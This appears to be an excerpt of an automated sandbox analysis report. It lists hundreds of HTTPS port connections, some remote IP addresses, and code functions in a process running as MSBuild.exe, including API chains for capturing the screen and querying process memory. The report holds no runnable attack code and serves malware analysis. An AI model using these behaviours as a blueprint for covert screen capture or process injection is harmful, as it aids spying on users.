Source: unknown Network traffic detected: HTTP traffic on port 53805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53696 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53705
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53826
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53704
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53825
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53703
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53824
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53702
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53823
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53709
Source: unknown Network traffic detected: HTTP traffic on port 53734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53829
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53828
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53706
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53827
Source: unknown Network traffic detected: HTTP traffic on port 53640 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53701
Source: unknown Network traffic detected: HTTP traffic on port 53663 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53822
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53700
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53821
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53820
Source: unknown Network traffic detected: HTTP traffic on port 53827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53894 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53837
Source: unknown Network traffic detected: HTTP traffic on port 53838 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53715
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53836
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53835
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53713
Source: unknown Network traffic detected: HTTP traffic on port 53756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53834
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53719
Source: unknown Network traffic detected: HTTP traffic on port 53861 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53718
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53839
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53717
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53838
Source: unknown Network traffic detected: HTTP traffic on port 53700 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53712
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53833
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53711
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53832
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53710
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53831
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53830
Source: unknown Network traffic detected: HTTP traffic on port 53767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53909 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53685 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53872 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53849 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53686
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53685
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53684
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53683
Source: unknown Network traffic detected: HTTP traffic on port 53906 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53689
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53688
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53687
Source: unknown Network traffic detected: HTTP traffic on port 53850 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53693
Source: unknown Network traffic detected: HTTP traffic on port 53896 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53692
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53691
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53690
Source: unknown Network traffic detected: HTTP traffic on port 53873 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53678 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53655 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53884 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53697
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53696
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53695
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53694
Source: unknown Network traffic detected: HTTP traffic on port 53758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53699
Source: unknown Network traffic detected: HTTP traffic on port 53666 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53698
Source: unknown Network traffic detected: HTTP traffic on port 53826 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53793 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53769 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53690 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53814 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53885 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53837 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53862 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53701 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53667 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53689 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53794 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53905 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53851 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53803 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53649
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53648
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53769
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53647
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53768
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53889
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53763
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53884
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53641
Source: unknown Network traffic detected: HTTP traffic on port 53736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53883
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53761
Source: unknown Network traffic detected: HTTP traffic on port 53759 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53688 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53640
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53882
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53760
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53881
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53646
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53767
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53888
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53645
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53766
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53887
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53765
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53886
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53764
Source: unknown Network traffic detected: HTTP traffic on port 53665 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53885
Source: unknown Network traffic detected: HTTP traffic on port 53802 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53825 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53770
Source: unknown Network traffic detected: HTTP traffic on port 53771 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53891
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53890
Source: unknown Network traffic detected: HTTP traffic on port 53863 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53659
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53658
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53779
Source: unknown Network traffic detected: HTTP traffic on port 53836 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53653
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53774
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53895
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53773
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53652
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53894
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53651
Source: unknown Network traffic detected: HTTP traffic on port 53702 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53772
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53893
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53650
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53771
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53892
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53657
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53778
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53899
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53656
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53777
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53898
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53655
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53897
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53654
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53775
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53896
Source: unknown Network traffic detected: HTTP traffic on port 53907 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53660
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53781
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53780
Source: unknown Network traffic detected: HTTP traffic on port 53874 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53677 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53669
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53664
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53785
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53663
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53784
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53783
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53662
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53661
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53782
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53668
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53789
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53667
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53788
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53666
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53787
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53665
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53786
Source: unknown Network traffic detected: HTTP traffic on port 53792 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53875 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53852 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53671
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53792
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53670
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53791
Source: unknown Network traffic detected: HTTP traffic on port 53714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53790
Source: unknown Network traffic detected: HTTP traffic on port 53747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53676 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53813 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53886 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53781 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53699 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53675
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53796
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53674
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53795
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53673
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53794
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53672
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53793
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53679
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53678
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53799
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53677
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53798
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53797
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53676
Source: unknown Network traffic detected: HTTP traffic on port 53824 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53897 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53682
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53681
Source: unknown Network traffic detected: HTTP traffic on port 53770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53680
Source: unknown Network traffic detected: HTTP traffic on port 53654 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53887 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53835 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53726 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53864 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53669 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53812 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53646 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53681 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53903 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53899 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53853 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53772 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53898 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53670 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53800 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53647 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53865 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53876 -> 443
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:53640 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:53641 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:53645 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:53658 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:53878 version: TLS 1.2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00411F55 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow, 3_2_00411F55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0040145B GetCurrentProcess,NtQueryInformationProcess, 3_2_0040145B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CBCED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset, 3_2_6CBCED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CC0B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 3_2_6CC0B700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CC0B8C0 rand_s,NtQueryVirtualMemory, 3_2_6CC0B8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CC0B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 3_2_6CC0B910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CBAF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 3_2_6CBAF280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CBC5E90 3_2_6CBC5E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CC0E680 3_2_6CC0E680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CBABEF0 3_2_6CBABEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CBBFEF0 3_2_6CBBFEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CC04EA0 3_2_6CC04EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CC16E63 3_2_6CC16E63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CBE7E10 3_2_6CBE7E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CBF5600 3_2_6CBF5600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CBAC670 3_2_6CBAC670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CBC9E50 3_2_6CBC9E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CBE3E50 3_2_6CBE3E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CC09E30 3_2_6CC09E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CBF2E4E 3_2_6CBF2E4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CBC4640 3_2_6CBC4640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CBF77A0 3_2_6CBF77A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CBD6FF0 3_2_6CBD6FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CBADFE0 3_2_6CBADFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CBE7710 3_2_6CBE7710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CBB9F00 3_2_6CBB9F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CC150C7 3_2_6CC150C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CBD60A0 3_2_6CBD60A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CBCC0E0 3_2_6CBCC0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CBE58E0 3_2_6CBE58E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CBEB820 3_2_6CBEB820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CBF4820 3_2_6CBF4820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CBB7810 3_2_6CBB7810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CBEF070 3_2_6CBEF070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CBC8850 3_2_6CBC8850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CBCD850 3_2_6CBCD850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CBDD9B0 3_2_6CBDD9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CBAC9A0 3_2_6CBAC9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CBE5190 3_2_6CBE5190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CC02990 3_2_6CC02990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CC1B170 3_2_6CC1B170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CBFB970 3_2_6CBFB970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CBBD960 3_2_6CBBD960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CBCA940 3_2_6CBCA940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CBBCAB0 3_2_6CBBCAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CBA22A0 3_2_6CBA22A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CBD4AA0 3_2_6CBD4AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CBC1AF0 3_2_6CBC1AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CBEE2F0 3_2_6CBEE2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CC1BA90 3_2_6CC1BA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CC12AB0 3_2_6CC12AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CBE8AC0 3_2_6CBE8AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CBE9A60 3_2_6CBE9A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CC153C8 3_2_6CC153C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CBAF380 3_2_6CBAF380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CBED320 3_2_6CBED320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CBBC370 3_2_6CBBC370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CBA5340 3_2_6CBA5340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CC4ECC0 3_2_6CC4ECC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CCAECD0 3_2_6CCAECD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CC5AC60 3_2_6CC5AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CD16C00 3_2_6CD16C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CD2AC30 3_2_6CD2AC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CDDCDC0 3_2_6CDDCDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CCE6D90 3_2_6CCE6D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CC54DB0 3_2_6CC54DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CD7AD50 3_2_6CD7AD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CD1ED70 3_2_6CD1ED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CDD8D20 3_2_6CDD8D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CC5AEC0 3_2_6CC5AEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CCF0EC0 3_2_6CCF0EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CCD6E90 3_2_6CCD6E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CCEEE70 3_2_6CCEEE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CD30E20 3_2_6CD30E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CD2EFF0 3_2_6CD2EFF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CC50FE0 3_2_6CC50FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CD98FB0 3_2_6CD98FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CC5EFB0 3_2_6CC5EFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CCBEF40 3_2_6CCBEF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CD12F70 3_2_6CD12F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CC56F10 3_2_6CC56F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CD90F20 3_2_6CD90F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CD568E0 3_2_6CD568E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_6CD24840 3_2_6CD24840
